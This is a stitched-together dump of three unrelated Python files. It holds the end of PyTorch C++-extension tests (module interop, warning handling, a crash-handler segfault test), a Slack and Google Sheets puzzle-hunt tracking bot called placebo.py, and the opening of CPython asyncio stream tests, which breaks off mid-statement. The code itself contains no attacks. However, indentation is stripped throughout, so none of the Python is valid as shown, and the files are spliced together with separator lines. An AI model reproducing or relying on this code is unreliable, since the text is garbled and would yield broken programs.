input = torch.randn(2, 5, dtype=dtype)
cpp_linear = extension.Net(5, 2)
cpp_linear.to(dtype)
python_linear = torch.nn.Linear(5, 2).to(dtype)
# First make sure they have the same parameters
cpp_parameters = dict(cpp_linear.named_parameters())
with torch.no_grad():
python_linear.weight.copy_(cpp_parameters["fc.weight"])
python_linear.bias.copy_(cpp_parameters["fc.bias"])
cpp_output = cpp_linear.forward(input)
python_output = python_linear(input)
self.assertEqual(cpp_output, python_output)
cpp_output.sum().backward()
python_output.sum().backward()
for p in cpp_linear.parameters():
self.assertFalse(p.grad is None)
self.assertEqual(cpp_parameters["fc.weight"].grad, python_linear.weight.grad)
self.assertEqual(cpp_parameters["fc.bias"].grad, python_linear.bias.grad)
def test_cpp_frontend_module_python_inter_op(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
# Create a torch.nn.Module which uses the C++ module as a submodule.
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.x = torch.nn.Parameter(torch.tensor(1.0))
self.net = extension.Net(3, 5)
def forward(self, input):
return self.net.forward(input) + self.x
net = extension.Net(5, 2)
net.double()
net.to(torch.get_default_dtype())
self.assertEqual(str(net), "Net")
# Further embed the torch.nn.Module into a Sequential, and also add the
# C++ module as an element of the Sequential.
sequential = torch.nn.Sequential(M(), torch.nn.Tanh(), net, torch.nn.Sigmoid())
input = torch.randn(2, 3)
# Try calling the module!
output = sequential.forward(input)
# The call operator is bound to forward too.
self.assertEqual(output, sequential(input))
self.assertEqual(list(output.shape), [2, 2])
# Do changes on the module hierarchy.
old_dtype = torch.get_default_dtype()
sequential.to(torch.float64)
sequential.to(torch.float32)
sequential.to(old_dtype)
self.assertEqual(sequential[2].parameters()[0].dtype, old_dtype)
# Make sure we can access these methods recursively.
self.assertEqual(len(list(sequential.parameters())), len(net.parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.named_parameters())), len(net.named_parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.buffers())), len(net.buffers()) * 2)
self.assertEqual(len(list(sequential.modules())), 8)
# Test clone()
net2 = net.clone()
self.assertEqual(len(net.parameters()), len(net2.parameters()))
self.assertEqual(len(net.buffers()), len(net2.buffers()))
self.assertEqual(len(net.modules()), len(net2.modules()))
# Try differentiating through the whole module.
for parameter in net.parameters():
self.assertIsNone(parameter.grad)
output.sum().backward()
for parameter in net.parameters():
self.assertFalse(parameter.grad is None)
self.assertGreater(parameter.grad.sum(), 0)
# Try calling zero_grad()
net.zero_grad()
for p in net.parameters():
self.assertEqual(p.grad, torch.zeros_like(p))
# Test train(), eval(), training (a property)
self.assertTrue(net.training)
net.eval()
self.assertFalse(net.training)
net.train()
self.assertTrue(net.training)
net.eval()
# Try calling the additional methods we registered.
biased_input = torch.randn(4, 5)
output_before = net.forward(biased_input)
bias = net.get_bias().clone()
self.assertEqual(list(bias.shape), [2])
net.set_bias(bias + 1)
self.assertEqual(net.get_bias(), bias + 1)
output_after = net.forward(biased_input)
self.assertNotEqual(output_before, output_after)
# Try accessing parameters
self.assertEqual(len(net.parameters()), 2)
np = net.named_parameters()
self.assertEqual(len(np), 2)
self.assertIn("fc.weight", np)
self.assertIn("fc.bias", np)
self.assertEqual(len(net.buffers()), 1)
nb = net.named_buffers()
self.assertEqual(len(nb), 1)
self.assertIn("buf", nb)
self.assertEqual(nb[0][1], torch.eye(5))
def test_cpp_frontend_module_has_up_to_date_attributes(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
self.assertEqual(len(net._parameters), 0)
net.add_new_parameter("foo", torch.eye(5))
self.assertEqual(len(net._parameters), 1)
self.assertEqual(len(net._buffers), 1)
net.add_new_buffer("bar", torch.eye(5))
self.assertEqual(len(net._buffers), 2)
self.assertEqual(len(net._modules), 1)
net.add_new_submodule("fc2")
self.assertEqual(len(net._modules), 2)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_cpp_frontend_module_python_inter_op_with_cuda(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
cpu_parameters = [p.clone() for p in net.parameters()]
device = torch.device("cuda", 0)
net.to(device)
for i, p in enumerate(net.parameters()):
self.assertTrue(p.device.type == "cuda")
self.assertTrue(p.device.index == 0)
self.assertEqual(cpu_parameters[i], p)
net.cpu()
net.add_new_parameter("a", torch.eye(5))
net.add_new_parameter("b", torch.eye(5))
net.add_new_buffer("c", torch.eye(5))
net.add_new_buffer("d", torch.eye(5))
net.add_new_submodule("fc2")
net.add_new_submodule("fc3")
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
net.cuda()
for p in net.parameters():
self.assertTrue(p.device.type == "cuda")
def test_returns_shared_library_path_when_is_python_module_is_true(self):
source = """
#include <torch/script.h>
torch::Tensor func(torch::Tensor x) { return x; }
static torch::RegisterOperators r("test::func", &func);
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
functions="func",
verbose=True,
is_python_module=False,
)
self.assertEqual(torch.ops.test.func(torch.eye(5)), torch.eye(5))
def test_set_default_type_also_changes_aten_default_type(self):
module = torch.utils.cpp_extension.load_inline(
name="test_set_default_type",
cpp_sources="torch::Tensor get() { return torch::empty({}); }",
functions="get",
verbose=True,
)
initial_default = torch.get_default_dtype()
try:
self.assertEqual(module.get().dtype, initial_default)
torch.set_default_dtype(torch.float64)
self.assertEqual(module.get().dtype, torch.float64)
torch.set_default_dtype(torch.float32)
self.assertEqual(module.get().dtype, torch.float32)
torch.set_default_dtype(torch.float16)
self.assertEqual(module.get().dtype, torch.float16)
finally:
torch.set_default_dtype(initial_default)
def test_compilation_error_formatting(self):
# Test that the missing-semicolon error message has linebreaks in it.
# This'll fail if the message has been munged into a single line.
# It's hard to write anything more specific as every compiler has its own
# error formatting.
with self.assertRaises(RuntimeError) as e:
torch.utils.cpp_extension.load_inline(
name="test_compilation_error_formatting",
cpp_sources="int main() { return 0 }")
pattern = r'.*(\\n|\\r).*'
self.assertNotRegex(str(e), pattern)
def test_warning(self):
# Note: the module created from this source will include the py::key_error
# symbol. But because of visibility and the fact that it lives in a
# different compilation unit than pybind, this trips up ubsan even though
# it is fine. "ubsan.supp" thus needs to contain "vptr:warn_mod.so".
source = '''
// error_type:
// 0: no error
// 1: torch::TypeError
// 2: python_error()
// 3: py::error_already_set
at::Tensor foo(at::Tensor x, int error_type) {
std::ostringstream err_stream;
err_stream << "Error with " << x.type();
TORCH_WARN(err_stream.str());
if(error_type == 1) {
throw torch::TypeError(err_stream.str().c_str());
}
if(error_type == 2) {
PyObject* obj = PyTuple_New(-1);
TORCH_CHECK(!obj);
// Pretend it was caught in a different thread and restored here
auto e = python_error();
e.persist();
e.restore();
throw e;
}
if(error_type == 3) {
throw py::key_error(err_stream.str());
}
return x.cos();
}
'''
# Ensure double type for hard-coded c name below
t = torch.rand(2).double()
cpp_tensor_name = r"CPUDoubleType"
# Without error handling, the warnings cannot be caught
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=False)
with warnings.catch_warnings(record=True) as w:
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 0)
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=True)
with warnings.catch_warnings(record=True) as w:
# Caught with no error should be detected
warn_mod.foo(t, 0)
self.assertEqual(len(w), 1)
# Caught with cpp error should also be detected
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 2)
# Caught with python error should also be detected
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 3)
# Caught with pybind error should also be detected
# Note that there is no type name translation for pybind errors
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 4)
# Make sure warnings raised as errors are handled properly
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("error")
# No error occurs, so the warning itself is raised as an error
with self.assertRaisesRegex(UserWarning, t.type()):
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
# Another error happened, the warning is ignored
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
def test_autograd_from_cpp(self):
source = '''
void run_back(at::Tensor x) {
x.backward({});
}
void run_back_no_gil(at::Tensor x) {
pybind11::gil_scoped_release no_gil;
x.backward({});
}
'''
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, gx):
return gx
test_backward_deadlock = torch.utils.cpp_extension.load_inline(name='test_backward_deadlock',
cpp_sources=[source],
functions=['run_back', 'run_back_no_gil'],)
# This used to deadlock
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
with self.assertRaisesRegex(RuntimeError, "The autograd engine was called while holding the GIL."):
test_backward_deadlock.run_back(loss)
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
test_backward_deadlock.run_back_no_gil(loss)
def test_custom_compound_op_autograd(self):
# Test that a custom compound op (i.e. a custom op that just calls other aten ops)
# correctly returns gradients of those other ops
source = """
#include <torch/library.h>
torch::Tensor my_add(torch::Tensor x, torch::Tensor y) {
return x + y;
}
TORCH_LIBRARY(my, m) {
m.def("add", &my_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
verbose=True,
is_python_module=False,
)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
gradcheck(torch.ops.my.add, [a, b], eps=1e-2)
@unittest.skipIf(not has_breakpad(), "Breakpad library must be present on system for crash handler")
@unittest.skipIf(TEST_WITH_ASAN, "ASAN disables the crash handler's signal handler")
def test_crash_handler(self):
def run_test(stderr_file, destination):
# Code to enable dumps and trigger a segfault
csrc = textwrap.dedent(f"""
#include <torch/torch.h>
int fail() {{
torch::crash_handler::enable_minidumps("{destination}");
volatile int* bad = nullptr;
return *bad;
}}
""")
# Some special stuff to overwrite stderr for a C++ extension
# Copied from: https://stackoverflow.com/questions/8804893/redirect-stdout-from-python-for-c-calls
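# The fd dance below: duplicate fd 2 (stderr) to keep a handle to it, point
# fd 2 at stderr_file so the extension's output lands in that file, then wrap
# the saved descriptor in a Python file object.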
sys.stdout.flush()
newstdout = os.dup(2)
devnull = os.open(stderr_file, os.O_WRONLY)
os.dup2(devnull, 2)
os.close(devnull)
sys.stdout = os.fdopen(newstdout, 'w')
module = torch.utils.cpp_extension.load_inline(
name="segfault",
cpp_sources=csrc,
functions=["fail"],
)
module.fail()
with tempfile.TemporaryDirectory() as temp_dir, tempfile.NamedTemporaryFile() as stderr:
# Use multiprocessing to spin up a separate process to make catching
# the segfault easier
p = Process(target=run_test, args=(stderr.name, temp_dir))
p.start()
p.join()
with open(stderr.name) as f:
result = f.read().strip()
# Check that the signal handler was called
self.assertTrue(result.startswith(f"Wrote minidump to {temp_dir}"))
with open(result.replace("Wrote minidump to ", ""), "rb") as dump_file:
dump_bytes = dump_file.read()
# Check that the file has the correct magic number
self.assertEqual(b"MDMP", dump_bytes[0:4])
if __name__ == "__main__":
common.run_tests()
|
placebo.py
|
import logging
import os
import queue
import threading
from typing import Callable, Optional
import requests
import google_client
import slack_client
import util
logging.basicConfig(format='{asctime} {name} {levelname}: {message}', style='{')
logging.getLogger('googleapiclient').setLevel(logging.ERROR) # It's real noisy.
log = logging.getLogger('placebo')
log.setLevel(logging.DEBUG if os.getenv('PLACEBO_DEBUG_LOGS') == '1' else logging.INFO)
class Placebo:
def __init__(self) -> None:
self.create_metas = os.getenv('PLACEBO_CREATE_METAS', '1') == '1'
self.metas_have_names = (self.create_metas and
os.environ.get('PLACEBO_METAS_HAVE_NAMES') == '1')
self.google = google_client.Google()
self.slack = slack_client.Slack()
log.addHandler(slack_client.SlackLogHandler(self.slack, level=logging.ERROR))
self.queue: queue.Queue[Callable[[], None]] = queue.Queue()
# If set, it's the round in which the most recent puzzle was unlocked. It's used as the
# default round for the unlock dialog, to make repeated unlocks easier.
self.last_round: Optional[str] = None
threading.Thread(target=self._worker_thread, daemon=True).start()
auth_url = self.google.start_oauth_if_necessary()
if auth_url:
self.slack.dm_admin(f'While logged in as the bot user, please visit {auth_url}')
# The public methods don't do any work -- they just enqueue a call to the corresponding private
# method, which the worker thread picks up. That accomplishes two things:
# - Ensures we always return a 200 for the incoming HTTP request promptly, without waiting for
# our API backends.
# - Ensures we're never handling more than one request at a time.
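# For example, new_round() below only enqueues a call to _new_round(); the
# worker thread picks it up, so the incoming Slack request gets its 200 right away.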
def new_round(self, round_name: str, round_url: str, round_color: Optional[util.Color],
meta_name: Optional[str] = None) -> None:
self.queue.put(lambda: self._new_round(round_name, round_url, round_color, meta_name))
def new_puzzle(self, round_name: str, puzzle_name: str, puzzle_url: str,
response_url: Optional[str] = None) -> None:
self.queue.put(lambda: self._new_puzzle(round_name, puzzle_name, puzzle_url, response_url,
meta=False, round_color=None))
def solved_puzzle(
self, puzzle_name: str, answer: str, response_url: Optional[str] = None) -> None:
self.queue.put(lambda: self._solved_puzzle(puzzle_name, answer, response_url))
def view_closed(self, view_id: str) -> None:
self.queue.put(lambda: self._view_closed(view_id))
def _worker_thread(self) -> None:
while True:
func = self.queue.get()
try:
func()
except BaseException:
# TODO: Reply to the original command if we can.
log.exception('Error in worker thread.')
def _new_round(self, round_name: str, round_url: str, round_color: Optional[util.Color],
meta_name: Optional[str]) -> None:
if self.create_metas:
if not meta_name:
meta_name = f'{round_name} Meta'
self._new_puzzle(round_name, meta_name, round_url, response_url=None, meta=True,
round_color=round_color)
else:
self.last_round = round_name
round_color = self.google.add_empty_row(round_name, round_color)
self.slack.announce_round(round_name, round_url, round_color)
def _new_puzzle(self, round_name: str, puzzle_name: str, puzzle_url: str,
response_url: Optional[str], meta: bool,
round_color: Optional[util.Color]) -> None:
_ephemeral_ack(f'Adding *{puzzle_name}*...', response_url)
if meta and self.metas_have_names:
full_puzzle_name = f'{puzzle_name} ({round_name} Meta)'
else:
full_puzzle_name = puzzle_name
if self.google.exists(full_puzzle_name):
raise KeyError(f'Puzzle "{full_puzzle_name}" is already in the tracker.')
# Creating the spreadsheet is super slow, so do it in parallel.
doc_url_future = util.future(self.google.create_puzzle_spreadsheet, [full_puzzle_name])
# Meanwhile, set up everything else...
self.last_round = round_name
if meta and self.metas_have_names:
alias = puzzle_name
channel_name, channel_id = self.slack.create_channel(puzzle_url, prefix='meta',
alias=alias)
elif meta:
channel_name, channel_id = self.slack.create_channel(puzzle_url, prefix='meta')
else:
channel_name, channel_id = self.slack.create_channel(puzzle_url)
priority = 'L' if meta else 'M'
round_color = self.google.add_row(round_name, full_puzzle_name, priority, puzzle_url,
channel_name, round_color)
if meta:
self.slack.announce_round(round_name, puzzle_url, round_color)
else:
self.slack.announce_unlock(round_name, full_puzzle_name, puzzle_url, channel_name,
channel_id, round_color)
# ... then wait for the doc URL, and go back and fill it in. But don't hold up the worker
# thread in the meantime.
def await_and_finish():
doc_url = doc_url_future.wait()
self.queue.put(
lambda: self._finish_new_puzzle(full_puzzle_name, puzzle_url, channel_id, doc_url))
threading.Thread(target=await_and_finish).start()
def _finish_new_puzzle(
self, full_puzzle_name: str, puzzle_url: str, channel_id: str, doc_url: str) -> None:
try:
self.google.set_doc_url(full_puzzle_name, doc_url)
except KeyError:
log.exception('Tracker row went missing before we got to it -- puzzle name changed?')
except google_client.UrlConflictError as e:
log.exception('Doc URL was set before we got to it')
doc_url = e.found_url
self.slack.set_topic(channel_id, puzzle_url, doc_url)
def _solved_puzzle(self, puzzle_name: str, answer: str, response_url: Optional[str]) -> None:
# It'll already be in caps if it was typed as a command arg, but it might not be if it came
# from the modal.
answer = answer.upper()
_ephemeral_ack(f'Marking *{puzzle_name}* correct...', response_url)
lookup = self.google.lookup(puzzle_name)
if lookup is None:
raise KeyError(f'Puzzle "{puzzle_name}" not found.')
row_index, doc_url, channel_name = lookup
if doc_url:
self.google.mark_doc_solved(doc_url)
self.google.mark_row_solved(row_index, answer)
if channel_name:
self.slack.solved(channel_name, answer)
self.slack.announce_solved(puzzle_name, answer)
def _view_closed(self, view_id: str) -> None:
self.slack.delete_in_progress_message(view_id)
def _ephemeral_ack(message, response_url) -> None:
if not response_url:
return
log.info('Logging ephemeral acknowledgment...')
response = requests.post(response_url, json={
'text': message,
'response_type': 'ephemeral'
})
if response.status_code != 200:
log.error(f"Couldn't log ephemeral acknowledgment: {response.status_code} {response.text}")
|
test_streams.py
|
"""Tests for streams.py."""
import gc
import os
import queue
import pickle
import socket
import sys
import threading
import unittest
from unittest import mock
from test import support
try:
import ssl
except ImportError:
ssl = None
import asyncio
from test.test_asyncio import utils as test_utils
class StreamTests(test_utils.TestCase):
DATA = b'line1\nline2\nline3\n'
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
def tearDown(self):
# just in case we have transport close callbacks
test_utils.run_briefly(self.loop)
self.loop.close()
gc.collect()
super().tearDown()
@mock.patch('asyncio.streams.events')
def test_ctor_global_loop(self, m_events):
stream = asyncio.StreamReader()
self.assertIs(stream._loop, m_events.get_event_loop.return_value)
def _basetest_open_connection(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.readline()
data = self.loop.run_until_complete(f)
self.assertEqual(data, b'HTTP/1.0 200 OK\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
def test_open_connection(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection(conn_fut)
def _basetest_open_connection_no_loop_ssl(self, open_connection_fut):
try:
reader, writer = self.loop.run_until_complete(open_connection_fut)
finally:
asyncio.set_event_loop(None)
writer.write(b'GET / HTTP/1.0\r\n\r\n')
f = reader.read()
data = self.loop.run_until_complete(f)
self.assertTrue(data.endswith(b'\r\n\r\nTest message'))
writer.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_connection_no_loop_ssl(self):
with test_utils.run_test_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_connection(
*httpd.address,
ssl=test_utils.dummy_ssl_context(),
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_open_unix_connection_no_loop_ssl(self):
with test_utils.run_test_unix_server(use_ssl=True) as httpd:
conn_fut = asyncio.open_unix_connection(
httpd.address,
ssl=test_utils.dummy_ssl_context(),
server_hostname='',
loop=self.loop)
self._basetest_open_connection_no_loop_ssl(conn_fut)
def _basetest_open_connection_error(self, open_connection_fut):
reader, writer = self.loop.run_until_complete(open_connection_fut)
writer._protocol.connection_lost(ZeroDivisionError())
f = reader.read()
with self.assertRaises(ZeroDivisionError):
self.loop.run_until_complete(f)
writer.close()
test_utils.run_briefly(self.loop)
def test_open_connection_error(self):
with test_utils.run_test_server() as httpd:
conn_fut = asyncio.open_connection(*httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
@support.skip_unless_bind_unix_socket
def test_open_unix_connection_error(self):
with test_utils.run_test_unix_server() as httpd:
conn_fut = asyncio.open_unix_connection(httpd.address,
loop=self.loop)
self._basetest_open_connection_error(conn_fut)
def test_feed_empty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'')
self.assertEqual(b'', stream._buffer)
def test_feed_nonempty_data(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.assertEqual(self.DATA, stream._buffer)
def test_read_zero(self):
# Read zero bytes.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
data = self.loop.run_until_complete(stream.read(0))
self.assertEqual(b'', data)
self.assertEqual(self.DATA, stream._buffer)
def test_read(self):
# Read bytes.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(30), loop=self.loop)
def cb():
stream.feed_data(self.DATA)
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(self.DATA, data)
self.assertEqual(b'', stream._buffer)
def test_read_line_breaks(self):
# Read bytes without line breaks.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line1')
stream.feed_data(b'line2')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'line1', data)
self.assertEqual(b'line2', stream._buffer)
def test_read_eof(self):
# Read bytes, stop at eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(1024), loop=self.loop)
def cb():
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'', data)
self.assertEqual(b'', stream._buffer)
def test_read_until_eof(self):
# Read all bytes until eof.
stream = asyncio.StreamReader(loop=self.loop)
read_task = asyncio.Task(stream.read(-1), loop=self.loop)
def cb():
stream.feed_data(b'chunk1\n')
stream.feed_data(b'chunk2')
stream.feed_eof()
self.loop.call_soon(cb)
data = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1\nchunk2', data)
self.assertEqual(b'', stream._buffer)
def test_read_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.read(2))
self.assertEqual(b'li', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.read(2))
def test_invalid_limit(self):
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=0, loop=self.loop)
with self.assertRaisesRegex(ValueError, 'imit'):
asyncio.StreamReader(limit=-1, loop=self.loop)
def test_read_limit(self):
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'chunk')
data = self.loop.run_until_complete(stream.read(5))
self.assertEqual(b'chunk', data)
self.assertEqual(b'', stream._buffer)
def test_readline(self):
# Read one line. 'readline' will need to wait for the data
# to come from 'cb'
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'chunk1 ')
read_task = asyncio.Task(stream.readline(), loop=self.loop)
def cb():
stream.feed_data(b'chunk2 ')
stream.feed_data(b'chunk3 ')
stream.feed_data(b'\n chunk4')
self.loop.call_soon(cb)
line = self.loop.run_until_complete(read_task)
self.assertEqual(b'chunk1 chunk2 chunk3 \n', line)
self.assertEqual(b' chunk4', stream._buffer)
def test_readline_limit_with_existing_data(self):
# Read one line. The data is in StreamReader's buffer
# before the event loop is run.
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1\nline2\n')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer should contain the remaining data after exception
self.assertEqual(b'line2\n', stream._buffer)
stream = asyncio.StreamReader(limit=3, loop=self.loop)
stream.feed_data(b'li')
stream.feed_data(b'ne1')
stream.feed_data(b'li')
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# No b'\n' at the end. The 'limit' is set to 3. So before
# waiting for the new data in buffer, 'readline' will consume
# the entire buffer, and since the length of the consumed data
# is more than 3, it will raise a ValueError. The buffer is
# expected to be empty now.
self.assertEqual(b'', stream._buffer)
def test_at_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
self.assertFalse(stream.at_eof())
self.loop.run_until_complete(stream.readline())
self.assertFalse(stream.at_eof())
stream.feed_data(b'some data\n')
stream.feed_eof()
self.loop.run_until_complete(stream.readline())
self.assertTrue(stream.at_eof())
def test_readline_limit(self):
# Read one line. StreamReaders are fed with data after
# their 'readline' methods are called.
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
# The buffer had just one line of data, and after raising
# a ValueError it should be empty.
self.assertEqual(b'', stream._buffer)
stream = asyncio.StreamReader(limit=7, loop=self.loop)
def cb():
stream.feed_data(b'chunk1')
stream.feed_data(b'chunk2\n')
stream.feed_data(b'chunk3\n')
stream.feed_eof()
self.loop.call_soon(cb)
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'chunk3\n', stream._buffer)
# check strictness of the limit
stream = asyncio.StreamReader(limit=7, loop=self.loop)
stream.feed_data(b'1234567\n')
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'1234567\n', line)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678\n')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'12345678')
with self.assertRaises(ValueError) as cm:
self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readline_nolimit_nowait(self):
# All needed data for the first 'readline' call will be
# in the buffer.
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA[:6])
stream.feed_data(self.DATA[6:])
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line1\n', line)
self.assertEqual(b'line2\nline3\n', stream._buffer)
def test_readline_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some data')
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'some data', line)
def test_readline_empty_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_eof()
line = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'', line)
def test_readline_read_byte_count(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(self.DATA)
self.loop.run_until_complete(stream.readline())
data = self.loop.run_until_complete(stream.read(7))
self.assertEqual(b'line2\nl', data)
self.assertEqual(b'ine3\n', stream._buffer)
def test_readline_exception(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'line\n')
data = self.loop.run_until_complete(stream.readline())
self.assertEqual(b'line\n', data)
stream.set_exception(ValueError())
self.assertRaises(
ValueError, self.loop.run_until_complete, stream.readline())
self.assertEqual(b'', stream._buffer)
def test_readuntil_separator(self):
stream = asyncio.StreamReader(loop=self.loop)
with self.assertRaisesRegex(ValueError, 'Separator should be'):
self.loop.run_until_complete(stream.readuntil(separator=b''))
def test_readuntil_multi_chunks(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(separator=b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAA')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'lineAAAxxx')
data = self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(b'lineAAA', data)
self.assertEqual(b'xxx', stream._buffer)
def test_readuntil_multi_chunks_1(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYaa')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'QWEaa')
stream.feed_data(b'XYa')
stream.feed_data(b'aa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'QWEaaXYaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'aaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'aaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'Xaaa')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'Xaaa', data)
self.assertEqual(b'', stream._buffer)
stream.feed_data(b'XXX')
stream.feed_data(b'a')
stream.feed_data(b'a')
stream.feed_data(b'a')
data = self.loop.run_until_complete(stream.readuntil(b'aaa'))
self.assertEqual(b'XXXaaa', data)
self.assertEqual(b'', stream._buffer)
def test_readuntil_eof(self):
stream = asyncio.StreamReader(loop=self.loop)
stream.feed_data(b'some dataAA')
stream.feed_eof()
with self.assertRaises(asyncio.IncompleteReadError) as cm:
self.loop.run_until_complete(stream.readuntil(b'AAA'))
self.assertEqual(cm.exception.partial, b'some dataAA')
self.assertIsNone(cm.exception.expected)
self.assertEqual(b'', stream._buffer)
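# readuntil() raises LimitOverrunError once the buffered data exceeds the limit;
# the message differs depending on whether the separator has been seen yet,
# hence the 'not found' / 'is found' assertions below.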
def test_readuntil_limit_found_sep(self):
stream = asyncio.StreamReader(loop=self.loop, limit=3)
stream.feed_data(b'some dataAA')
with self.assertRaisesRegex(asyncio.LimitOverrunError,
'not found') as cm:
